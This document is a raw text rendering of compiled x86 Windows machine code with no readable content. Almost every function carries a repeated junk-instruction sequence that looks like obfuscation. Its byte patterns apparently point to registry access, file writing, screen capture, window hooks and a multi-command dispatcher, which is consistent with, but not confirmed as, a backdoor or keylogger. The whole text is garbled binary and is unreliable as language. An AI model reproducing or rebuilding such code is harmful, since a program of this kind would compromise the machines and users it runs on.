ǅ����l  ǅ����    ǅ����    jj ������Q������R������P�`A������+����������������������������j j j h(  ������P��x�����������u������Q��A�i  ������ t������R��A����������������������������ǅ����    ǅ������ ǅ����    ������R�з  �������������������������� ��   ������ ��   j ������Q������Rj j ��x������������u;��x������{���������������������Q�M�  ��������R��A�   j ������P������Q������R������P��A������3ҋ�����+�������ʉ������������6�����������|�����|���P�Ӷ  ��������Q��A�T�����x����������_^[��]� �������������U��j�h�0d�    Pd�%    QSVW�M��M��� �6����E�    �M���4  �!����E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M�f�AF �U�f�B
 �E�ǀ�  2   �M��A    �U��B    �E��@    �M��A    �U�ǂH      �E�ǀ�      �M�ǁ�      �U�ǂ�      �E�ǀ�      �M�ǁ�      �U�ǂ�      �E�ǀ�      �M�ǁ�      j j jj �TA�U����  j j j �XA�M����  �U�ǂ�      �E�ǀT      �M�ǁX      �U�ǂL      �E�ǀP      �E������E��M�d�    _^[��]�������V���   �D$t	V�Ŵ  ����^� ��U��j�h�0d�    Pd�%    ��SVW�M��E�� �C�E�   P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M����  R��A�E����  Q��A�U���T   t�E���T  �M��U�R��  ���E���X   t�M���X  �U�E�P���  ���M����   t�U����  �E�M�Q�ҳ  ���U����   t�E����  �M�U�R讳  ���E����   t�M����  R�x@�E����   t�M����  R�x@�E����   t�M����  R�x@�E���H   t�M���H  �E���H  �R�P�M���D   t�U���D  P�PA�M���4  �����M��� �����E� �M���4  �R����E������M��� �@����M�d�    _^[��]����������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��E�   �}� �  j��M����  R�B�E����  Q�HAj��U����  P�BP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj�M����  Q�M���4  ������tl�U����  ��P�M����  R�M���4  ������tCj�E�0  P�M���4  �p�����t&�M���0  R�E���@  Q�M���4  �J�����u	�E�    ��E�   �U����  P�LA�����_^[��]�����������U���TSVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M����   �_  ��AP��B�E�h   j j ��B�E�}� t
�U�R��Bj j j hc��@�E�E�P�|@�E�M����  R�E�P��@h  � j j �M�Q�U��BP�M��QRj j �E�P��@�M�Q��@�U�R�|@�E��E����  Q�U�R��@�E�P�|@�E܋M����  R�E�P��@�M���T  �U��E�    �	�E����E��M��U�;��  ��  �E�    �	�E؃��E؋M��U�;��  ��  h  � �E�k�0P�M�k�0Q�U�Rj0j0j j �E�P��@j �M���\  Q�U���X  Pj0j �M����  R�E�P��@�M���X  �UԋE��EЋM���L  ���UȋE�%  �yH���@�M���d  +ЉŰ]ԋUЋMȋD��3D����   �E���p  �U���X  �}������ȃ��h  � j j �M�Qj0j0j �U����  k�0P�M�Q��@�U�k�0�E����  �E����  f���M�k�0�U����  �U����  f�L��E����  ���U����  �>I�N����E���L  �UԍJ�EԋM���L  �EЍP�MЋŨ��Ũ}� �����E���p  �U��D
!�E��F��������M�Q��@�U�R��@�E����   �>  j0�M����  k�0R�E�P��@�EċM�Q�|@�E��U�R�E�P��@h  � j j �M�Qj0�U����  k�0Pj j �M�Q��@�U�R��@�E�P��@j��M����  R�B����  �E�ǀ0      ǀ4      �M�ǁ8      ǁ<      �U���0  Rj �E���<  Q��8  R�E���H  �U���H  �Q�Rj �E�P�0  ���E��M���H  �U��E��  P�M����  Q�U�R�E��HQ�ϩ  P�M���  �U��U��E��E��}� tj�M���M���E���E�    �E�P�x@�M�ǁ0      ǁ4      �U�ǂ8      ǂ<      �E�0  Pj�M���<  R��8  P�M���H  �E���H  �R�P�M��U����  ���  �M����  ���U����  �E����  �����ʃ��E����  Q�LA�U����  P��A�M�ǁ�      �
�U�R��@�E�P��B�M�3�f�Q
R� B�����M���4  �x����M��� �m���_^[��]�������U���h  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPhA  ��������4  �F�����t�MQhS  �������� �+�����u3��\  ��AP��B������h   j j ��B�E��}� t
�U�R��Bj j j hc��@������j������P��@�������Aj
������R��@�������A�������B��0   ����u�������B��0   �����������  � �������@��0   �������������  �������@��0   ����u�������B��0   �����������  � �������@��0   �������������  ���������������  ���  ��R芩  �����������������������  ���������������  ���  ��Q�M�  �����������������������  �������QR�������HQ������R��@���������  j0���������������  ���  k�0Q������R��@���������  j0j0������R��@���������  ������ǂ\  (   ������ǀ`  0   ������ǁd  0   ������fǂh   ������fǀj   ������ǁl      j ��������\  Rj j0j ���������  Q������R��@��������p  3ҹ0   �񋕜�����L  ��������L  �鋕������P  ��������������p  ���  ���������  Rj �8A��������D  ��������H  Rj ��������D  Q��C��������������p  ���  ���������  ��������0  ��������4  R��0  P��������H  ��������H  �R�P��������D  R�<A��������@  ���������������  ���  ��������p  ���������������  ���  k�!�Q辦  ����������������������T  ���������������  ���  ��������p  ���������������  ���  k�!�3���������T  �����ʃ�󪋅������p  ��!Q�.�  ����������������������X  ��������p  ��!3���������X  �����ʃ�󪋅����P�|@�E苍�������  R�E�P��@h  � j j ������Q�������BP�������QRj j �E�P��@������Q��@�U�R�|@���������������  Q������R��@��������T  �M�ǅ����    ���������������������������;��  ��   ǅ����    ���������������������������;��  }yh  � ������k�0R������k�0P�M�Qj0j0j j ������R��@j ������\  P�M�Qj0j ���������  P������Q��@�������E��p  �E��d����,����M�Q��@������R��@������P��Bǅ����   fǅ����  3ɉ�����������f�Bf������������f�Qf������fǅ����0 j ������P��������Qj������R��������4  �B�����u3��S  ������3�f�H��u)������ǂ�     h0c�������  P�@A�R������3�f�Q��uhc�������  P�@A�(������ǁ�  d   h0c���������  R�@A�������  P���������  Q�)  ��������ǂ�     �������  ��C���C�P��C�H��C�P������ǀ�     ������ǁ�     �������¸  ���������  ƅ���� �   3��������f��������Qh   @��������4  �.���������R��AP������P��������4  ������u3���  ������ǁ0      ǁ4      ������ǂ8      ǂ<      ������0  Pj ��������<  R��8  P��������H  ��������H  �R�Pj ���������  R�  ����������������H  ���������������  R�������  P������Q�������BP菞  ������������ t�������������Q������������������������������������������������������� tj���������������������
ǅ����    ������ǀ0      ǀ4      ������ǁ8      ǁ<      ��������0  Rj��������<  Q��8  R��������H  ��������H  �Q�Rj������0  P��������4  ������t/��������0  R��������@  Q��������4  ������u3��   �E�    3҉U��U�������Pj h�� �8B���E􋍜���Qj h�z �8B���E�������Rj hPy �8B���E�j�j�E�Pj�DA������ǁ�     h�  � B��������4  ������������ �����   _^[��]� �����������U���   SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj �M��� 腽������  f�E�  3ɉM�f�M��   ����  ��AP��B�E�h   j j ��B�E��}� t
�E�P��Bj�M�Q�M��� �.�����u�P  �U����   ���#  P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�%��  �E�M�����  �M�U�����  ��ur�E��x tZ�M��y tQ�U����  �E��@+3�+E�M�����  �U��B+��3�+E�E�%��  �M��A�U�����  �E��P��M��U�Q�E�A�E�    �   3��}��M�M̋U�UЋE�%��  �E��E�    �M�����  Q�U����  R��Bj�E�Pj��B�  �M����   ����  P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�U����  ��tfP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�   f�E� f�E� �E�    �E�    �E�    j�E�Pj��B�dP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�   f�E� f�E� �E�   �E�    �E�    j�M�Qj��B�U�����  ��tuP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅt���   fǅx��� fǅz��� ǅ|���    �E�    �E�    j��t���Pj��B�jj�M��   �M�����  ��tj j�M��   �jj�M��   j �U�R�M��v   j�E�P�M��h   �"�M����   ��u�U�Rj h�� �8B���E�P��B�W����M���4  �'����M��� �����M�ǁ�     _^[��]���������U��� SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�   f�Ef�E�f�Mf�M�U�U��E�    �E�    j�E�Pj��B_^[��]� ��U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX��AP��B�E�h   j j hHc��B�E��}� t
�E�P��Bh . j h  h��  ��B�M�Q��B_^[��]����������̋D$��t�A� 3�� �������������QVj��  ��3�;�t*�L$�T$�D$�D$PQR��C跖  �F�D$�F��^YÐ�QV��D$�D$    �NPQ谖  ��t�Fj萖  ��t�v�L$�p� �C�H^Y�3�^YÐ��������V��F��CP茖  �D$tV�m�  ��^� �����������V���   �D$tV�G�  ��^� ������A��CP�?�  �U��QSVW�M��M����k����E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�_^[��]�����������V���   �D$t	V�E�  ����^� ��U��j�h�0d�    Pd�%    QSVW�M��E�� �C�E�    P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��������E������M����&����M�d�    _^[��]������U���   SVW��X���P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPhE  ��X�����詻����u3��=  ƅ|��� �   3���}����f��hxrhhc��|���Q��B����|���Rj h  �,A��x�����x��� u3���  hxrhTc��|���P��B����|���Qj h   �0A�E��}� u3��  j���x���R�B���o  ��x���P�HAǅp���    ǅt���    j��M�Q�B����   j h�   jj jh   �ht��A��l�����l����t{j ��l���R�4A��h�����h��� vE��h���P��  ����d�����d�����p���j ��t���R��h���P��p���Q��l���R�dA��l���P��Aht��A�M�Q�LA��t��� v{��p��� trj j j ��X�����蠾����t"j ��t���R��p���P��X������N�����u��p�����`�����`���R�L�  ��� ��p�����\�����\���Q�/�  ���z����U�R��A��x���P��A�   _^[��]� ��������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�} ��   �E�E��M��y  u}�}uw�B+ ���vf�B�$��U��B�E��}�t�}�t�"jh�c�h  ���3jh|c�W  ���"f�E�  3ɉM��U��B�E�j�M�Q�3  ���UR�EP�MQ�|R��B_^[��]� ��������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��=(� ��   �(�    jh�c�  ����c��������c�� �����c������}   3������󫍍����Q��@�   +Ѓ�������������P������Q��@��E����R�D@h�c������P�(Aj������Q�	  ��jh�c��  ���} ��   �U��B������������  t��   �B+$�����   �B� ���B������������Q耒  ��������   3��|�j j h   ������R�Q�  ������������Ph|h   ������Q�(�  h~h|�dB��tjh|�,  ��h|h~�@A������ t������R������P�ӑ  �MQ�UR�EP�|Q��B_^[��]� �����������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�} |`�E�E��M��y  uN�(�   �U��B�E��}�t�jh�c�Z
  ���"f�E�  3ɉM��U��B�E�j�M�Q�6
  ���UR�EP�MQ�|R��B_^[��]� �U��SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj j h�  �,�P��B�=| t�|Q��B�=| t�|R��B�=| t�|P��B��fQ��A��fR��Ah�  � B_^[]�������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj j j �XA��fj j jj �TA��fj j hP� �8B����AP��B�E�h   j j h�c��B�E��}� t
�E�P��B�=| uj ��hQh� j��B�|�=| uj ��hRh� j��B�|h   j j hHc��B�E��}� t
�E�P��B�=| uj ��hQh@� j��B�|�U�R��B_^[��]���������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj h�   jj j h   @�EP��A�E��}��u3��Hjj j �M�Q� A�E�    j �U�R�EP�MQ�U�R��A�E�P��@�M�Q��A�   _^[��]��U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ|��� �?   3���}����f��j j h   ��|���P�MQ��@��P�URj j ��Aƅ���� �   3��������f��ƅ|��� �   3���}����f��ƅ ��� �?   3�������f��ƅ���� �?   3��������f���} ��   �|;E��   �M�|��l���R��A��x���%��  P��v�������  Q��t�������  R��r���%��  P��n�������  Q��l�������  Rh�c������P��B�� ǅh���    ��h���Q�|R��Bh  �� ���P�|Q��B������R��h���P��  ��������Q�� ���R������Ph�c��|���Q��B����|���R��|���P�B��|���Q��A��|���j���fR�B��uc���  +�|���9�fwP��|�����|����=�f=�f�����ʃ���f�|�����f��fQ�LA��fR��A_^[��]����U���   SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    3��E��E��E�   �E�   ƅl��� �   3���m����f��hxrhhc��l���Q��B����l���Rj j �E�P�TA��h���hxrhTc��l���Q��B����l���Rj �E�P�XA�E�h��  ��  ����`�����`����M�ǅd���    j���fR�B����   ��fP�HAj���fQ�B��u?��f�5�f�}������ʃ���f��d�����f    ��fQ�LA��d��� vAj���fR�B��d���P�M�Qht�#�������fR�LA��h���P��A�<����M���\�����\���R��  ���E�P��A��h���Q��A_^[��]������������U���P  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX��A�,�h�� �q�  ���������������E���  3��}��f�h��  �G�  ����������������fj j hP� �8B��j j j �U�R��B����  �}�  ��  f�E�  3�f�EދM����  f�M܋U���f�U؋E�%��  ������������������������������ t%������������ t,������������ t/�/  j�U�R�E�P�*������  �M�Q�U�R�(A�  �E�%��  ����   fǅ����  �   3��������f�������Q��A����������  R������%��  P����������  Q����������  R������%��  P����������  Qh�c������R��B�� j �E�P������Q�d������U�U܁���  ��
u5j �E�P�M�Q�B�����j �U�Rh|c�/�������  3��}��f��j �E�P�M�Q��������}�  u��(����U�������������P�-�  ����f������������R��  ��_^[��]���������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EP��@�E��E�    �	�M����M��U�;U�}Q�E��M3�f�A����  ����  �E%��  %��  %��  ��ЉU�M�Q��BPh�  �,�R��B�_^[��]�����������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    ������Ph�dhldh  ��!  ����t	������ u�v  ƅ���� ��   3��������f��������Qh`dhldh  ���  ����u�6  ƅ ��� ��   3�������f���� ���RhXd������P�;  ����tnj:�� ���Q�hB������������ t1������� �� ���P�MQ��A��������R�|B�M���� ���R�EP��A�M�P   �   ������R�� ���P��Aj=������Q�hB��uij:�� ���R�hB������������ t1�������  �� ���Q�UR��A��������P�|B�M���� ���R�EP��A�M�P   _^[��]����������������U��j�h�0d�    Pd�%    ��8  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f��ǅ����    ������P������Qh   j �URj ��A�E�}� t
�   ��   �������O����E�    j �EP�������ǧ����u'ǅ����    �E�����������跓���������   �E�    ǅ����    �MQ������R�E�P�������a�����u/�������"���ǅ����    �E������������V����������Q������Q�U�R�EP��  ���M�������������R輂  ��ǅ����   �E����������������������M�d�    _^[��]�������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�  �u� p��E� 3��E��E��M�Q�U�R��������E�P��A��t�}� tj�M�Q�U��  R��  ���Ex  P�  ���M���  Q�U��x  R�H
  ���E�  P�M��x  Q��  ���U��x  R�k	  ��_^[��]��U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�E��E�    �	�M����M��U�;Us�E�E�3Ɋ���U�U��
��_^[��]������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �?   3��������f��������Ph�fh�dh  ���  ��������Q��Bh�d������R�lB�E��}� t�E��@ ��������"u������R������P��A������Q�UR��A_^[��]���������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f��h�   ������P��hQ��Aj h�   jj jh   �������R��A�������������u3��\jj h����������P� A�E�    j �M�QhD  �UR������P�dA������Q��AhD  �UR�������   _^[��]����������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f��ƅ���� �@   3��������f��ƅ���� �@   3��������f���EPh�d������Q��B���UR������P��A�MQ������R�lB������������ u3��������P��A������ȉ�����j;������R�hB�E��}� u������P��A�������M��M�+������������}�����ʃ��E�+������M� �   _^[��]��������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�Ph?  j �MQ�UR�8@�E��}� t3��   ƅ���� �@   3��������f��ǅ����  ������P������Qj j �UR�E�P�<@�E��}� t�M�Q� @3��9�������������}�����ʃ��E�P� @�E��}� t3���   _^[��]�������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPj h  ��A�E��}� u�Oƅ���� �@   3��������f��h   ������Qj �U�R�y  ��v������P�MQ��A�U�R��A_^[��]�����U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�Pj(�hAP�4@�M�Qh�dj �H@�E�   �E�   j j j �U�Rj �E�P�T@_^[��]�����������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �	�E����E��M�;M}v�UU�3�������E��}�	~�M���7�U��E�P��M���0�U��E�P�MM�3Ҋ���U��}�	~�E���7�M��U�DJ��E���0�M��U�DJ�y���_^[��]���U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj h�   jj jh   ��EP��A�E��}��u3��.�E�    j �M�Q�UR�EP�M�Q�dA�U�R��A�   _^[��]������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EP��Aj h�   jj j h   @�MQ��A�E��}��u3��.�E�    j �U�R�EP�MQ�U�R��A�E�P��A�   _^[��]��U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�    �E�    �E�P�M�Q�v  �}� u����   �U�R�B���E�}� u����   �E��E�M��M�U�R�E�P�M�Q�Nv  �E�    �	�U����U��E�;E�sW�MQ�U�k�L�E�L0Q�,B����u6�U�k�L�E�M���P�Q�P�Q�@�A�M�Q�0B���E��똋U�R�0B�����_^[��]�������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXh?  j j �X@�E��}� u�Jh� �EP�M�Q�@@�E��}� u�U�R�d@�"j j �E�P�@�M�Q�d@�U�R�d@_^[��]���������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    ǅ����    h?  j j �X@������������ u����   ƅ���� �@   3��������f��h�   ������P��Ah e������Q�B�UR������P�Bj j j j j ������Qjjh  h� �UR�EP������Q�@������������ t������R�d@������P�d@3�_^[��]���������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�    h?  j j �X@�E��}� u����Jh� �EP�M�Q�@@�E��}� u�U�R�d@3�� �E�P�\@�M�Q�d@�U�R�d@3�_^[��]��������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    ǅ����    ������P�M�Qj h?  j j j �URh  ��,@�E��}� t�nƅ���� �@   3��������f���EP������Q��A������R��A��������������P������Qjj he�U�R�0@�E��E�P� @_^[��]���������������U���SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�    �E�P�M�Qj h?  j j j �URh  ��,@�E��}� t�/�E�   �E�P�MQjj h `�U�R�0@�E��E�P� @_^[��]�������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    ǅ����    ������P������Qj h?  j j j �URh  ��,@������������ t�t�EP��A��������ƅ���� �@   3��������f���MQ������R��A������P������Qjj h e������R�0@������������P� @_^[��]�������������U���  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    ǅ����    ������P������Qj h?  j j j h,eh  ��,@������������ t�sƅ���� �@   3��������f���UR������P��A�MQ��A��������������R������Pjj �MQ������R�0@������������P� @_^[��]�������������U���$  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�   ��e�������f��;   3�������f�j\hu�B�������������� t������P������Q�B��e��������e�������?   3���������e��������e��������e��������e������f��ef�������<   3��������f���e��������e��������e������f��ef�� ����=   3�������f���e��������e��������e������f��ef�������=   3��������f���e��������e��������e������f��ef�������=   3��������f���e��������e������f��ef��������e�������>   3��������ƅ���� �@   3��������f���MQ��������UR������P������Q������Rhpe������P��B��������Q������R�������EP������Q������R������Phde������Q��B��j������R�������EP������Q�������UR������P������Q������Rhpe������P��B��������Q������R�)������EP������Q������R������Phde������Q��B��j������R��������EP������Q�������UR������P������Q������Rhpe������P��B��������Q������R�������EP������Q������R������Phde������Q��B��j������R�T������EP������Q��������UR������P������Q������Rhpe������P��B��������Q������R��������EP������Q������R������Phde������Q��B��j������R�������EP������Q�[�����_^[��]��U��QSVW�M��M�����|���E�� �CP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��A    �U��B    �E��@    �M���$  Qh�   ��A��APh�e�U���$  R��A�M���$  R��B���E�_^[��]��������V���   �D$t	V�Ul  ����^� ��U��j�h1d�    Pd�%    ��SVW�M�E�� �C�E�    P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��������M�y t�U�B�E��M�Q��k  ���U��$  R��A�M��轑���E������M����{���M�d�    _^[��]�����������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EPhB  �M���肏����u3��  �   ���z  �M��,  ��u�i  �U��B�E��M��A    �U��U�E�-q  �E�}��  �M��$�~� �M��  �  �M��L  �  �M��'  ��   �M��2&  ��   �M��(  ��   �M���'  ��   �M��k  ��   �M��  �   �M��Q  �   �M��$  �   �M��W  �   �M��j
  �   �M��M  �x�M��  �n�M��Y  �d�M��  �Z�M��u  �P�M���   �F�M���  �<�M��  �2�M���   �(�M��  ��M��  ��M���  �
�U��B^  �M��;,  ��u��y����   _^[��]� �� �� �� �� �� �� �� �� �� � s� �� S� Y� f� S� � !� +� ?� 5� S� I� �� ?� L� � ������U��QSVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�Rj h�) �8B��_^[��]���������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�H�M��E�    �	�U����U��E�@3ҹ$  ��9E�s%jh�f�U���$R�E�P�  �M���$  �M��jj j �\B_^[��]����������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M�j �U�R��@��u
�E��@b  _^[��]�������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M��U���   R�E�P��@��u
�M��Aa  _^[��]�����U���  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H������ƅ���� �@   3��������f��j\j ������R�pB�E��}� u�������@c  �   �M�� �U���R������P��A�������(  �������������u�������Ai  �>������R������P������Q�������)  ��u�������BX  ������P��A_^[��]�����U���$SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�EP�M��   Q��A�U��R�E��P�M��Q�U��   R��@��u3�E�@    �@    �M�A    �A    �U�B    �B    �E�    �E�    �E� 3��E�E�E�E�E�f�E��E��MQh f�U�R��B��h�   �E   P�M�Q�U�Rj h�   �E�� P�M�Q��@�U�R��@�M�_^[��]� U���h  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H������ǅ����    ��   3�������󫍕����R������P�������O����������A`  �������J�������������x�����ʃ�󤋍�����  _^[��]�����������U���x  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX��������%  �������������u�������@i  �	  ƅ���� �@   3��������f��������Qh   ��@�E�ǅ����    ���������������������;E���   ������������R��B��������������Atx��������������Bteǅ����    ��   3�������󫍍����Q������������P�����������ǅ����    j ������Qh`  ������R������P��A�>���������Q��A_^[��]�����U���,  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    ��   3��������EP������Q��A������Rj �EP��@��u�#�E�    j �M�Qh$  ������R�EP��A_^[��]� �U���`  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H�M�ƅ���� �@   3��������f��ƅ���� �@   3��������f���U�R������P��A������Qhf������R��B��ǅ����    �O   3�������󫍅����P������Q��@�E��}��u�������BX  �  ��������"  �������������u�E�P��A�������Ai  ��   �E�    ƅ���� �@   3��������f���}� ��   hf������R��@��tRhf������P��@��t<������Q������Rhf������P��B��������Q������R����������������P�M�Q��@��u��@��u	�E�   ���^����U�R��@������P��A_^[��]��������U���,  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H������ǅ����    ��   3�������󫋕����R�� ���P��A������Qj ������R��@��u�������@_  �.�������y��   ������󥋕�����B$  ��������  _^[��]�������U���@  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�������H������ǅ����    ǅ����    ǅ����    ǅ����    ������R�� ���P��A������Qj ������R��@��u�������@_  �x������Q������R������P������Q�������e   ��u�������B_  �>�������@8  �������I�������������z�����ȃ�󤋍�����  _^[��]��������������U���`  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f��ƅ���� �@   3��������f���EP������Q��A������Rhf������P��B��ǅ����    �O   3�������󫍍����Q������R��@�E��}��u3��R  �E�    ƅ���� �@   3��������f���}� �  hf������P��@����   hf������Q��@����   ������R������Phf������Q��B������������t8�E����U�
�EP�MQ�UR������P�������k�����u3��   �A�M����E��������������������������E�������P������E��P������Q�U�R��@��u"��@��u	�E�   ��E�P��@3��������M�Q��@�   _^[��]� ���������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M�jj j �U�Rj j �TB_^[��]���U���\  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f���EP������Q��Aƅ���� �@   3��������f��ƅ���� �@   3��������f���UR������P��A������Qhf������R��B��ǅ����    �O   3�������󫍅����P������Q��@�������������u3��  �E�    ƅ���� �@   3��������f���}� �E  hf������R��@����  hf������P��@����  ������Q������Rhf������P��B������������t*�UR�EP������Q�������L�����u3���  �u  h f������R��@��thf������P��@��u������Q�UR�������z����.  ��������*u\��������.uP������R��A������������P��A+�V������Q��@��u������R�EP������������   ������Q��A��������.u~������P��A��������*ud������R��A��P������P������Q�xB��u9������R��A����������P��A;�u������Q�UR�������w����.������P������Q��@��u������R�EP�������G���������Q������R��@��u%��@��u	�E�   �������P��@3������������Q��@�   _^[��]� ����������U���4  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    �   3�������󫍅����Pj �MQ��@��u�eǅ����    ��   3�������󫋕�����������������������MQ������R��A�E�    j �E�Ph  ������Q�UR��A_^[��]� U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M��^  �E�}��u�E��@i  �w�M��Q�U��E�    �	�E����E��M��A3ҹ$  ��9E�s>�U��: t�E�P�M���$Q�M��?   ��U���$R�E�P�M��j����M���$  �M�륋U�R��A_^[��]������������U���X  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXƅ���� �@   3��������f��ƅ���� �@   3��������f���EP������Q��A������Rhf������P��B��ǅ����    �O   3�������󫍍����Q������R��@�E��}��u3��  �E�    ƅ���� �@   3��������f���}� ��   hf������P��@��t|hf������Q��@��tf������R������Phf������Q��B������������t �EP������Q������������u3��c�������R�EP����������������Q�U�R��@��u"��@��u	�E�   ��E�P��@3���(����M�Q��@�   _^[��]� ����U���(  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXǅ����    �   3��������f�ƅ���� �@   3��������f��ƅ���� �@   3��������f���EP������Q��A�UR������P��A�   3��������f�ǅ����    �M������������������������������fǅ�����������Q�XB���@_^[��]� �������U���	  SVWP3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E�    �E�P�MQ��B��A9E�u
�   �  ƅ���� �@   3��������f��h   ������R�EP��B������Q��A����   h�f������R��@����   h0f������P��@����   h$f������Q��@��trƅ���� �  3��������f���U������������P������Q��A������R�E�P�������ǅ����    j ������Qh  ������R�EP��A�   _^[��]� ��������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�M���  �E�}��u�E��@i  �U��AP��B�E�h   j j ��B�E��}� t
�M�Q��B�U�Rh`� ��B�E�P��B�M�Q��A_^[��]��������������U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M���AP��B�E�h   j j ��B�E��}� t
�U�R��B�E�  �M�}�t�j j j�U�   P��B��M�  R�E�   Q��B�U�  t�E�  u �M�   R��B�E�   Q��B�U�R��B_^[��]�������������U���D  SVW������P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhXj j�Q  �E��}� u�������@Y  ��  ǅ����    �I   3��������ǅ����(  ������Q�U�R�KQ  ��u�������@Y  �M�Q��A�  �����������  �������������u�������Bi  �p  ǅ����    ��   3�������󫋅����������������������������������������P������Q��Aj\j ������R�pB��u������P������Q�O�����ǅ����    j ������Rh  ������P������Q��A������R�E�P�<P  ����   ��   3�������󫋍����������������������������������������Q������R��Aj\j ������P�pB��u������Q������R������j ������Ph  ������Q������R��A�O���������P��A�M�Q��A_^[��]��U���SVW�M�P3�3�3�3�3�3��   3FhXP3�3�3�3�3�3��   3FhX�E��H�M�U�R�|B�E������E�Pj j��A�E��}� u